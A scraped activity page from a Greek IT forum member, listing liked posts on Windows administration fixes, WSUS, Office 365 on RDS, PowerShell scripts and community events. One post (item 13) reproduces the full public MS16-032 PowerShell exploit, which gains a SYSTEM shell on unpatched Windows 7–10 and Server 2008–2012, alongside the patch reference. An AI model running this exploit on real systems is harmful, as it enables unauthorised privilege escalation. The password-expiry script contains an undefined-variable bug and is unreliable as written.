Jump to content

Blackman

Members
  • Posts

    1970
  • Joined

  • Last visited

  • Days Won

    15

Reputation Activity

  1. Like
    Blackman got a reaction from VoIP Phones in Εξαρση VoIP hacking στην Ελλάδα   
    α όλα και όλα...
    το πόσο καλά ξέρει ο Σπιλιώτης το asterisk δεν έχω συναντήσει άλλον...
     
    οπότε μπροστά του είμαι πολύ νέοπας...
    είμαι ...ρωμαίος και εκείνος ο Οβελίσκος
     
    ακόμα και όταν ο Καψαλάκης μας παρουσίαζε πριν αρκετό καιρό τον Communicator σε live εγκατάσταση...στην παρουσίαση μαζί με τον Σπιλιώτη μας είχαν δείξει το πόσο καλά λειτουργούν μαζί αυτά τα δύο...
  2. Like
    Blackman got a reaction from VoIP Phones in Εξαρση VoIP hacking στην Ελλάδα   
    τον gspiliot []
  3. Like
    Blackman reacted to bedrock in Windows 7 System Restore μέσω Group Policy?   
    Λοιπόν θα φτιάξεις ένα bat script και θα το βάλεις μέσω GPO να εκτελείται στο logon. Αυτό θα καλεί ένα PowerShell script που θα βρίσκεται σε ένα network share που βλέπουν όλοι χρήστες.
     
    ensystemrestore.bat
    powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file "\\nameoftheuncpath\ensystemrestore.ps1" ensystemrestore.ps1
    #### Enable System Restore on System Volumes #### Enable-ComputerRestore -drive "C:\", "F:\" vssadmin resize shadowstorage /on=c: /for=c: /maxsize=16%;vssadmin resize shadowstorage /on=f: /for=f: /maxsize=16% Τα παραπάνω thresholds τα κάνεις adjust σύμφωνα με τις ανάγκες σου. Καθώς και τα Volumes που θες  
  4. Like
    Blackman got a reaction from Billytsik in the user profile service failed to logon. user profile cannot be loaded   
    Είχα αυτό το μήνυμα λάθους σε ένα σύστημα με Windows 7, όπου οι χρήστες που είχαν ήδη προφίλ δούλευαν κανονικά, αλλά όποιος καινούριος χρήστης προσπαθούσε να συνδεθεί, δεν μπορούσε καθώς ουσιαστικά δεν μπορούσε να δημιουργήσει το νέο προφίλ...

    η λύση ήταν να πας στο
    C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\SQM\iesqmdata_setup0.sqm

    και να δώσεις δικαιώματα read στους χρήστες (users)

    και μετά είσαι κομπλέ!
  5. Like
    Blackman got a reaction from Vardeos in Microsoft VDI   
    χμ... κάτσε να το ψάξω λίγο και επανέρχομαι
  6. Like
    Blackman got a reaction from NoName1976 in Ζητω 8088 - 8086   
    και όμως πρόσφατα άκουσα σε ένα φίλο ότι ένας γνωστός του δικηγόρος έχει ένα τέτοιο μηχάνημα που λειτουργεί γιατί τρέχει ένα πρόγραμμα που του έχουν φτιάξει από τότε! τι και πως...λεπτομέριες δεν ξέρω!

    στα σκουπίδια πλέον δεν θα βρεις κάτι τέτοιο. 15 χρόνια πριν ίσως

    τώρα είναι συλλεκτικά
  7. Like
    Blackman reacted to afotakel in Πρόσκληση στο μεγαλύτερο ευρωπαϊκό διαγωνισμό cyber security   
    https://www.secnews.gr/105165/cyber-security-challenge/   Ο ENISA (European Union Agency for Network and Information Security) διοργανώνει το European Cyber Security Challenge 2016, το μεγαλύτερο πανευρωπαϊκό διαγωνισμό για νέους με ταλέντο στο cyber security. Ο διαγωνισμός θα διεξαχθεί το Νοέμβρη στο Dusseldorf της Γερμανίας, στον οποίο η ελληνική αποστολή θα κληθεί να αναμετρηθεί με εθνικές ομάδες άλλων χωρών πάνω σε πρακτικές ασκήσεις web security, mobile security, crypto puzzles, reverse engineering, forensics, κ.ά.     Δηλώστε συμμετοχή τώρα !     Η σύσταση της ελληνικής ομάδας που θα διαγωνισθεί στη Γερμανία θα διεξαχθεί μέσω ενός προκριματικού γύρου – στον οποίο σας προσκαλούμε να συμμετάσχετε!     Ο προκριματικός γύρος θα διεξαχθεί το Σάββατο 9 Ιουλίου στα κτήρια του Τμήματος Ψηφιακών Συστημάτων του Πανεπιστημίου Πειραιώς. Οι συμμετέχοντες θα αναμετρηθούν για 10 διαθέσιμες θέσεις και θα διαγωνιστούν πάνω σε θέματα παρόμοια με αυτά της τελικής φάσης του διαγωνισμού. Οι συμμετέχοντες θα πρέπει να είναι Έλληνες ή να διαμένουν στην Ελλάδα, να έχουν ηλικία μεταξύ 14-30 ετών, να μην έχουν μεταπτυχιακό ή επαγγελματική εμπειρία στον τομέα της ασφάλειας πληροφοριών – και φυσικά να έχουν γνώσεις πάνω στο information security! Απαιτείται επίσης γνώση αγγλικών, μιας και η γλώσσα διεξαγωγής και των δύο διαγωνισμών θα είναι τα αγγλικά.    Υπεύθυνοι για την ελληνική συμμετοχή είναι η εταιρεία TwelveSec και το Τμήμα Ψηφιακών Συστημάτων του Πανεπιστημίου Πειραιώς, ενώ η προσπάθεια στηρίζεται και από άλλα μεγάλα ελληνικά πανεπιστήμια και οργανισμούς, όπως το Security BSides Athens.   Για να συμμετάσχετε στον προκριματικό γύρο και να έχετε την ευκαιρία να εκπροσωπήσετε την Ελλάδα, εγγραφείτε στην επίσημη σελίδα της ελληνικής ομάδας http://ecsc.gr/  
  8. Like
    Blackman got a reaction from Vardeos in the user profile service failed to logon. user profile cannot be loaded   
    Είχα αυτό το μήνυμα λάθους σε ένα σύστημα με Windows 7, όπου οι χρήστες που είχαν ήδη προφίλ δούλευαν κανονικά, αλλά όποιος καινούριος χρήστης προσπαθούσε να συνδεθεί, δεν μπορούσε καθώς ουσιαστικά δεν μπορούσε να δημιουργήσει το νέο προφίλ...

    η λύση ήταν να πας στο
    C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\SQM\iesqmdata_setup0.sqm

    και να δώσεις δικαιώματα read στους χρήστες (users)

    και μετά είσαι κομπλέ!
  9. Like
    Blackman got a reaction from klag in the user profile service failed to logon. user profile cannot be loaded   
    Είχα αυτό το μήνυμα λάθους σε ένα σύστημα με Windows 7, όπου οι χρήστες που είχαν ήδη προφίλ δούλευαν κανονικά, αλλά όποιος καινούριος χρήστης προσπαθούσε να συνδεθεί, δεν μπορούσε καθώς ουσιαστικά δεν μπορούσε να δημιουργήσει το νέο προφίλ...

    η λύση ήταν να πας στο
    C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\SQM\iesqmdata_setup0.sqm

    και να δώσεις δικαιώματα read στους χρήστες (users)

    και μετά είσαι κομπλέ!
  10. Like
    Blackman reacted to kavag in 1o Azure Bootcamp για IT Professionals   
    Ενημερωθήκαμε πως εξαιτίας ενός τεχνικού προβλήματος υπάρχει περίπτωση κάποιοι να μην έλαβαν το email με τις παρουσιάσεις και τις οδηγίες για τα labs, οπότε παραθέτουμε το email εδώ:
     
    Σας ευχαριστούμε για τη συμμετοχή σας στην εξής εκδήλωση:
    1o Azure Bootcamp για IT Professionals
    Microsoft Hellas
    Λεωφόρος Κηφισίας 221, Μαρούσι
    Σάββατο 23 Απριλίου, 10π.μ. - 4μ.μ.
     
    Σχετικά με το περιεχόμενο των παρουσιάσεων:
     
    Μπορείτε να βρείτε το περιεχόμενο των παρουσιάσεων εδώ Για να ενεργοποιήσετε το δωρεάν Azure Pass και να πάρετε 100$ χωρίς πιστωτική για να ξοδέψετε σε ότι υπηρεσία του Azure θέλετε, μεταβείτε στη διεύθυνση microsoftazurepass.com Για να αποκτήσετε πρόσβαση στα Virtual Labs και να εξασκήσετε τις γνώσεις σας, μπορείτε να επισκεφτείτε τη σελίδα https://aka.ms/iti και να εισέλθετε στο χώρο των labs με τον κωδικό ITIS231D237C (επιλέγοντας «Redeem Training Key»). Για να κατεβάσετε το Visual Studio δωρεάν και να ξεκινήσετε τη δοκιμή του Azure επισκεφτείτε το visualstudio.com
      Χρήσιμα Links:
     
    Microsoft Azure Azure Management Portal Azure Free Trial Microsoft Virtual Academy courses for Azure
      Θα χαρούμε να σας υποδεχτούμε στο μέλλον!
     
    To Τμήμα Τεχνολογίας της Microsoft Ελλάς
  11. Like
    Blackman got a reaction from nkspeed in WSUS stopped   
    το πρόβλημα προέρχεται από την εγκατάσταση updates...

    αρχικά διάβασα ότι το KB3148812 είχε πρόβλημα...
    το εγκατέστησα και έκανα επανεκκίνηση. Το πρόβλημα παρέμενε...

    διαβάζω ότι το παραπάνω πάει πακέτο KB3159706 το οποίο φαίνεται ότι συνδέεται με το παραπάνω και ότι έχει κάποια βήματα μετά την εγκατάσταση του όπου και μετά παίζει κανονικά!
     
    Open an elevated Command Prompt window, and then run "C:\Program Files\Update Services\Tools\wsusutil.exe postinstall /servicing" (case sensitive, assume C: as the system volume). Select HTTP Activation under .NET Framework 4.5 Features in the Server Manager Add Roles and Features wizard. Restart the WSUS service.
  12. Like
    Blackman reacted to kavag in 61ο autoexec.gr Community Event   
    Φίλες και Φίλοι,

    Με μεγάλη χαρά ανακοινώνουμε το 61ο autoexec.gr Community Event, την Πέμπτη 26 Μαίου στις 18:30, στις εγκαταστάσεις της Microsoft Hellas (Κηφισίας 221, Μαρούσι).

    Όπως κάθε φορά, έτσι και τώρα, θα υπάρξουν ομιλίες από μέλη του autoexec.gr, ενώ θα παρουσιαστούν τεχνολογίες με ιδιαίτερο ενδιαφέρον όπως το PowerBI και το Software Defined Networking που θα έρθει μαζί με τον Windows Server 2016.

    Πρόγραμμα

    Hyper-V Network Virtualization in Windows Server 2016, VXLAN & other features, Παναγιώτης Κούτσιος.
    Power BI Stack - Analytics solutions for your whole organization, Αντώνης Χατζηπαυλής.

    FAQs
     
    Χρειάζεται προεγγραφή; Ναι, δηλώστε συμμετοχή εδώ
    Πόσο κοστίζει; Είναι δωρεάν
    Χρειάζεται να είμαι μέλος του autoexec.gr; Όχι, αλλά προτείνεται
    Πόση ώρα διαρκεί; Περίπου 3 ώρες
  13. Like
    Blackman reacted to kavasilop in Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)   
    To patch ειναι : https://technet.microsoft.com/en-us/library/security/ms16-032.aspx
    Για να δουμε αν εχουμε το patch : wmic qfe | find "KB3139914"
    function Invoke-MS16-032 { <# .SYNOPSIS PowerShell implementation of MS16-032. The exploit targets all vulnerable operating systems that support PowerShell v2+. Credit for the discovery of the bug and the logic to exploit it go to James Forshaw (@tiraniddo). Targets: * Win7-Win10 & 2k8-2k12 <== 32/64 bit! * Tested on x32 Win7, x64 Win8, x64 2k12R2 Notes: * In order for the race condition to succeed the machine must have 2+ CPU cores. If testing in a VM just make sure to add a core if needed mkay. * The exploit is pretty reliable, however ~1/6 times it will say it succeeded but not spawn a shell. Not sure what the issue is but just re-run and profit! * Want to know more about MS16-032 ==> https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html .DESCRIPTION Author: Ruben Boonen (@FuzzySec) Blog: http://www.fuzzysecurity.com/ License: BSD 3-Clause Required Dependencies: PowerShell v2+ Optional Dependencies: None E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736 .EXAMPLE C:\PS> Invoke-MS16-032 #> Add-Type -TypeDefinition @" using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security.Principal; [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; } [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] public struct STARTUPINFO { public Int32 cb; public string lpReserved; public string lpDesktop; public string lpTitle; public Int32 dwX; public Int32 dwY; public Int32 dwXSize; public Int32 dwYSize; public Int32 dwXCountChars; public Int32 dwYCountChars; public Int32 dwFillAttribute; public Int32 dwFlags; public Int16 wShowWindow; public Int16 cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [StructLayout(LayoutKind.Sequential)] public struct SQOS { public int Length; public int ImpersonationLevel; public int ContextTrackingMode; public bool EffectiveOnly; } public static class Advapi32 { [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] public static extern bool CreateProcessWithLogonW( String userName, String domain, String password, int logonFlags, String applicationName, String commandLine, int creationFlags, int environment, String currentDirectory, ref STARTUPINFO startupInfo, out PROCESS_INFORMATION processInformation); [DllImport("advapi32.dll", SetLastError=true)] public static extern bool SetThreadToken( ref IntPtr Thread, IntPtr Token); [DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenThreadToken( IntPtr ThreadHandle, int DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle); [DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenProcessToken( IntPtr ProcessHandle, int DesiredAccess, ref IntPtr TokenHandle); [DllImport("advapi32.dll", SetLastError=true)] public extern static bool DuplicateToken( IntPtr ExistingTokenHandle, int SECURITY_IMPERSONATION_LEVEL, ref IntPtr DuplicateTokenHandle); } public static class Kernel32 { [DllImport("kernel32.dll")] public static extern uint GetLastError(); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr GetCurrentProcess(); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr GetCurrentThread(); [DllImport("kernel32.dll", SetLastError=true)] public static extern int GetThreadId(IntPtr hThread); [DllImport("kernel32.dll", SetLastError = true)] public static extern int GetProcessIdOfThread(IntPtr handle); [DllImport("kernel32.dll",SetLastError=true)] public static extern int SuspendThread(IntPtr hThread); [DllImport("kernel32.dll",SetLastError=true)] public static extern int ResumeThread(IntPtr hThread); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool TerminateProcess( IntPtr hProcess, uint uExitCode); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool CloseHandle(IntPtr hObject); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool DuplicateHandle( IntPtr hSourceProcessHandle, IntPtr hSourceHandle, IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle, int dwDesiredAccess, bool bInheritHandle, int dwOptions); } public static class Ntdll { [DllImport("ntdll.dll", SetLastError=true)] public static extern int NtImpersonateThread( IntPtr ThreadHandle, IntPtr ThreadToImpersonate, ref SQOS SecurityQualityOfService); } "@ function Get-ThreadHandle { # StartupInfo Struct $StartupInfo = New-Object STARTUPINFO $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread() $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread() $StartupInfo.hStdError = [Kernel32]::GetCurrentThread() $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size # ProcessInfo Struct $ProcessInfo = New-Object PROCESS_INFORMATION # CreateProcessWithLogonW --> lpCurrentDirectory $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED $CallResult = [Advapi32]::CreateProcessWithLogonW( "user", "domain", "pass", 0x00000002, "C:\Windows\System32\cmd.exe", "", 0x00000004, $null, $GetCurrentPath, [ref]$StartupInfo, [ref]$ProcessInfo) # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS $lpTargetHandle = [IntPtr]::Zero $CallResult = [Kernel32]::DuplicateHandle( $ProcessInfo.hProcess, 0x4, [Kernel32]::GetCurrentProcess(), [ref]$lpTargetHandle, 0, $false, 0x00000002) # Clean up suspended process $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) $lpTargetHandle } function Get-SystemToken { echo "`n[?] Trying thread handle: $Thread" echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)" $CallResult = [Kernel32]::SuspendThread($Thread) if ($CallResult -ne 0) { echo "[!] $Thread is a bad thread, moving on.." Return } echo "[+] Thread suspended" echo "[>] Wiping current impersonation token" $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero) if (!$CallResult) { echo "[!] SetThreadToken failed, moving on.." $CallResult = [Kernel32]::ResumeThread($Thread) echo "[+] Thread resumed!" Return } echo "[>] Building SYSTEM impersonation token" # SecurityQualityOfService struct $SQOS = New-Object SQOS $SQOS.ImpersonationLevel = 2 #SecurityImpersonation $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) # Undocumented API's, I like your style Microsoft $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos) if ($CallResult -ne 0) { echo "[!] NtImpersonateThread failed, moving on.." $CallResult = [Kernel32]::ResumeThread($Thread) echo "[+] Thread resumed!" Return } $script:SysTokenHandle = [IntPtr]::Zero # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle) if (!$CallResult) { echo "[!] OpenThreadToken failed, moving on.." $CallResult = [Kernel32]::ResumeThread($Thread) echo "[+] Thread resumed!" Return } echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" echo "[+] Resuming thread.." $CallResult = [Kernel32]::ResumeThread($Thread) } # main() <--- $ms16032 = @" __ __ ___ ___ ___ ___ ___ ___ | V | _|_ | | _|___| |_ |_ | | |_ |_| |_| . |___| | |_ | _| |_|_|_|___|_____|___| |___|___|___| [by b33f -> @FuzzySec] "@ $ms16032 # Check logical processor count, race condition requires 2+ echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)" if ($([System.Environment]::ProcessorCount) -lt 2) { echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n" Return } # Create array for Threads & TID's $ThreadArray = @() $TidArray = @() echo "[>] Duplicating CreateProcessWithLogonW handles.." # Loop Get-ThreadHandle and collect thread handles with a valid TID for ($i=0; $i -lt 500; $i++) { $hThread = Get-ThreadHandle $hThreadID = [Kernel32]::GetThreadId($hThread) # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray if ($TidArray -notcontains $hThreadID) { $TidArray += $hThreadID if ($hThread -ne 0) { $ThreadArray += $hThread # This is what we need! } } } if ($($ThreadArray.length) -eq 0) { echo "[!] No valid thread handles were captured, exiting!" Return } else { echo "[?] Done, got $($ThreadArray.length) thread handle(s)!" echo "`n[?] Thread handle list:" $ThreadArray } echo "`n[*] Sniffing out privileged impersonation token.." foreach ($Thread in $ThreadArray){ # Get handle to SYSTEM access token Get-SystemToken echo "`n[*] Sniffing out SYSTEM shell.." echo "`n[>] Duplicating SYSTEM token" $hDuplicateTokenHandle = [IntPtr]::Zero $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) # Simple PS runspace definition echo "[>] Starting token race" $Runspace = [runspacefactory]::CreateRunspace() $StartTokenRace = [powershell]::Create() $StartTokenRace.runspace = $Runspace $Runspace.Open() [void]$StartTokenRace.AddScript({ Param ($Thread, $hDuplicateTokenHandle) while ($true) { $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle) } }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle) $AscObj = $StartTokenRace.BeginInvoke() echo "[>] Starting process race" # Adding a timeout (10 seconds) here to safeguard from edge-cases $SafeGuard = [diagnostics.stopwatch]::StartNew() while ($SafeGuard.ElapsedMilliseconds -lt 10000) { # StartupInfo Struct $StartupInfo = New-Object STARTUPINFO $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size # ProcessInfo Struct $ProcessInfo = New-Object PROCESS_INFORMATION # CreateProcessWithLogonW --> lpCurrentDirectory $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED $CallResult = [Advapi32]::CreateProcessWithLogonW( "user", "domain", "pass", 0x00000002, "C:\Windows\System32\cmd.exe", "", 0x00000004, $null, $GetCurrentPath, [ref]$StartupInfo, [ref]$ProcessInfo) $hTokenHandle = [IntPtr]::Zero $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) # If we can't open the process token it's a SYSTEM shell! if (!$CallResult) { echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n" $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread) $StartTokenRace.Stop() $SafeGuard.Stop() Return } # Clean up suspended process $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) } # Kill runspace & stopwatch if edge-case $StartTokenRace.Stop() $SafeGuard.Stop() } } PoC Windows 10 : 

  14. Like
    Blackman reacted to pagath1 in κοινή χρήση USB stick serial number   
    Ευχαριστώ για την απάντηση. Μοιρασα το usb me $ και μετα εκανα net use και παίζει η εφαρμογή.
  15. Like
    Blackman reacted to aggelosk in Multiple positions   
    Καλησπέρα σε όλους. Το παρακάτω email μου ήρθε από recruiter. Αν κάποιος ενδιαφέρεται ας επικοινωνήσει μαζί του. Απλά διευκρινίζω ότι δεν έχω καμμία σχέση με την εταιρεία και δεν είμαι recruiter. Υπάρχουν πολλές θέσεις και είναι flexible σε location.
     
    Territory/Country Manager or Head of Marketing: Full P&L responsibility
    -       Head of CRM
    -       Head of Acquisition
    -       Head of BI
    -       Head of VIP
    -       Campaign Manager
    -       Business Analytics Manager
    -       VIP Manager
     
    They’re flexible on location. Ideally, Athens although London and Gibraltar is also possible. As they’re recruiting a team they’re going to keep their flexibility until they have conversations with people and decide on some key hires and where those people prefer (want) to be based.
     
    Dennis Van Maanen
    CEO | Esanda Recruitment
    London | New York | San Francisco
    UK: +44(0)208 7892121 | NYC: +1-347-7538257 | SOF: +1 (415) 358 1673
    Cell:+44(0)7771590471 | Email: [email protected] | Linked In
    www.esandarecruitment.com
     
  16. Like
    Blackman reacted to kavag in 60ο autoexec.gr Community Event   
    Φίλες και Φίλοι,
     
    Όπως είχαμε υποσχεθεί το 60ο autoexec.gr Community Event, θα διεξαχθεί την Πέμπτη 31 Μαρτίου 2016 στις 18:30 και θα περιλαμβάνει πολλές πληροφορίες και λεπτομέρειες σχετικά με το Linux και γενικότερα το Open Source Software ! Ο χώρος διεξαγωγής θα είναι οι εγκαταστάσεις της Microsoft Hellas (Κηφισίας 221, Μαρούσι).
     
    Αναλυτικότερα, οι ομιλίες που θα πραγματοποιηθούν από μέλη του Autoexec.gr, θα έιναι οι παρακάτω :
     
    Πρόγραμμα
     
    Linux και open source: Ιστορικό, δυνατότητες, διανομές, GUI και παραδείγματα.
    Τεχνική και ιστορική ανάλυση για όσους γνωρίζουν windows και όχι μόνο. Γιώργος Σπηλιώτης
     
    FAQs
     
    Χρειάζεται προεγγραφή; Ναι, δηλώστε συμμετοχή εδώ
    Πόσο κοστίζει; Είναι δωρεάν
    Χρειάζεται να είμαι μέλος του autoexec.gr; Όχι, αλλά προτείνεται
    Πόση ώρα διαρκεί; Περίπου 3 ώρες
  17. Like
    Blackman reacted to nkspeed in Why Is Microsoft Releasing SQL Server on Linux?   
    Συμφωνω με την παρακατω παραγραφο, αν και πρεπει να διαβαστει ολο το αρθρο για να καταλαβεις το ακριβες νοημα.
     
    link
     
    ΝΚ
  18. Like
    Blackman reacted to giotis in Powershell Script to notify users of expiring passwords   
    Και ένα μικρό Script για να ειδοποιούνται οι χρήστες πως οι κωδικοί τους θα λήξουν σε X μέρες
    <# Script to notify users of password change #> #Variables----------------------------------------------------------### #What date is it? $Today=Get-date #How many days before should we notify the user? $Days=50 #Specify a From address $From="[email protected]" #Specify a subject for the message! $Subject="Your account will expire soon! Action Required" #Specify the SMTP Server ! $SMTPServer="10.0.0.1" #-------------------------------------------------------------------### #Start!-------------------------------------------------------------### #Find all users that will need a password change within the specified days, We are searching for all Enabled accounts , with Password never expires option not set and not containing a $ sign (Domains with trust accounts,GMSA accounts ...etc, we do not need those) $Expiring=Get-ADUser -filter {Enabled -eq $True -and PasswordNeverExpires -eq $False -and Name -notlike "*$*"} –Properties "DisplayName", "msDS-UserPasswordExpiryTimeComputed" ,"PasswordExpired" , "Mail","UserPrinciPalName" #Loop through each account foreach ($Account in $Expiring) { #And get its expiring date, convert it to a more readable format as msDS-UserPasswordExpiryTimeComputed is a calculated field and it is a mess $ExpiringDate=[datetime]::FromFileTime($Password."msDS-UserPasswordExpiryTimeComputed") #If you do find an account that has not expired and the remaining days are less than the days specified if ($Account.PasswordExpired -eq $false -and ($ExpiringDate - $Today).Days -lt $Days ) { #Start the notification process #Get the actual UPN in the domain as this may differ from the users email $AccountUPN=$Account.UserPrinciPalName #Calculate the days left $DaysLeft=($ExpiringDate-$Today).Days #Inform the user Send-MailMessage -SmtpServer $SMTPServer -From $From -To $Account.Mail -Subject $Subject -Body "Your AD Password for account $AccountUPN will expire in $DaysLeft days! Please change it." } }
  19. Like
    Blackman reacted to giotis in Failover clustering PowerShell   
    function waitForPSDirect
     
    Εμείς να δεις πως περιμένουμε ,πέρα από την πλάκα , το script του Armstrong είναι κέντημα και ακόμη πιο κέντημα θεωρώ το DSC ,αν έχεις την όρεξη φυσικά να το φτιάξεις από το 0.
     
    Στην Ελλάδα των 10Nodes max αυτά είναι πολυτέλειες και γίνονται μόνο για τη φάση μας.
  20. Like
    Blackman reacted to kavag in Failover clustering PowerShell   
    Επειδή βλέπω πως σας αρέσουν αυτά έχω να παραθέσω μερικά URLs.
     
    Ben Armstrong's Big Build Script @ MVP Summit 2015
     
    Στο τελευταίο MVP Summit (2015), o Ben Armstrong, Principal Program Manager στον Hyper-V, μας παρουσίασε όλες τις νέες δυνατότητες του Hyper-V που έρχεται στον Windows Server 2016, μέσω αυτού του Script που φτιάχνει .... ένα ολόκληρο DataCenter ! Η παρουσίαση είχε τίτλο "Hold My Beer while i build the Datacenter"
     
    Θα πάρετε πολλές ιδέες σχετικά με την διαχείριση των images, NanoServer, Containers και θα δείτε functions που αυτοματοποιούν κάποιες εργασίες που ο Παναγιώτης αφήνει αυτόν που τρέχει το script, να κάνει manual, δηλαδή Reboot, AD Join κ.λ.π.
     
    Θα ποστάρω και μιά δική μου έκδοση του Script που είναι μιά striped down version ....
  21. Like
    Blackman reacted to giotis in RDS + Office 365 installation   
    Μια από τις ερωτήσεις που δέχομαι (ως MVP του Remote Desktop ή του νέου Enterprise Mobility) είναι το τι γίνεται αν έχω Office 365 και θέλω να το τρέξω σε ένα Remote Desktop περιβάλλον.
     
    Σημαντικό είναι το subscription που έχουμε να έχει δικαιώματα για χρήση σε Remote Desktop. Μπορείτε να δείτε τις διαφορετικές εκδόσεις και το τι συμπεριλαμβάνει η κάθε μια σε αυτόν το σύνδεσμο.
     
    Καταρχήν , για να παίξει το Office 365 (ή 366 αν είναι δίσεκτο ,επειδή το κινέζικο είναι λίγο πιο μπερδεμένο ακολουθήστε αυτό το link ) σε ένα RDS Server χρειάζεται το shared activation.
     
    Η διαδικασία είναι εξαιρετικά απλή , φτιάχνουμε ένα φάκελο στο C:\ του Server που θέλουμε να κάνουμε activation και μέσα στο φάκελο φτιάχνουμε ένα αρχείο που το ονομάζουμε configuration.xml. Αυτό το αρχείο το κάνουμε edit με το Notepad και προσθέτουμε τα παρακάτω
     

       
        
              
        
       
                   
                        
                     

     
    Αποθηκεύουμε το αρχείο και κατεβάζουμε από τα παρακάτω links τα αρχεία εγκατάστασης
     
    Office Deployment Tool (Office 2013 version)
     
                Office Deployment Tool (Office 2016 version)
     
    Ανάλογα πάντα με τη version που θέλουμε.
    Κάνουμε Extract τα αρχεία στο φάκελο. Μέσα στο φάκελο μας λοιπόν θα βρούμε το αρχείο Setup.exe με το οποίο θα κατεβάσουμε καταρχήν τα αρχεία του office.
    Βγαίνουμε λοιπόν σε ένα command line και τρέχουμε setup.exe /download configuration.xml (η διαδικασία θα αργήσει λίγο να κατεβάσει τα αρχεία μέσω του internet ) και μόλις τελειώσει τρέχουμε
     
    Setup.exe /configuration configuration.xml
     
    Για περισσότερες πληροφορίες σχετικά με το setup μπορείτε να ρίξετε μια ματιά και στο TechNet
     
     
  22. Like
    Blackman reacted to giotis in TechNet Virtual Labs για Windows Server 2016!   
    Στο TechNet Virtual Labs υπάρχουν διαθέσιμα πλέον Labs σχετικά με τις τεχνολογίες του Windows Server 2016,
    Docker, Nano server, containers αλλά και OMS Suite διαθέσιμα με ένα κλικ από το σπίτι σας!
     
    Enjoy!
     
    Installing and Managing Nano Server
     
    In this lab you will use tools included with Windows Server 2016 to deploy new images of Nano Server as virtual machines. You will deploy fully-automated domain member virtual machines. You will additionally deploy virtual machines which are members of workgroups and manually join them to a domain. Finally, you will explore various management tools for Nano Server.
     
    Managing Windows Server Containers with Docker
     
    In this lab, you will learn how to create and manage Window Server containers. In the first exercise, you will explore the Docker commands to create containers and container images. You will also learn how to create a reusable container image that you can use to deploy containers. In the second exercise, you will use the knowledge you gained in the previous exercise to deploy an Nginx Web server in a container.
     
    Managing Windows Server Containers with Windows PowerShell
     
    In this lab, you will learn how to create and manage Window Server containers. In the first exercise, you will explore the Windows PowerShell cmdlets to create containers and container Images. You will also learn how to create a reusable container image that you can use to deploy containers. In the second exercise, you will use the knowledge you gained in the previous exercise to deploy an Nginx Web server in a container.
     
    Windows Server 2016: Configuring Storage Spaces Direct, Storage Quality of Service, and Storage Replication
     
    In this lab you will learn how to configure Storage Spaces Direct, Storage Quality of Service (QoS), and Storage Replication. In first part of the lab, you will learn how to configure Storage Spaces Direct by using System Center Virtual Machine Manager 2016 Technical Preview 2 and Windows Server 2016 Technical Preview 2. You first the configure a Scale-Out File Server that implements Storage Spaces Direct. You will then verify the configuration. Finally, you will learn how to configure Storage Quality of Service classifications in Virtual Machine Manager. In the final lab 2 lab exercises, you will learn how to configure Storage Replication, a feature which transparently replicates a storage volume to new location and then allows you to choose which copy is the master copy.
     
    OMS-Hybrid-Management
     
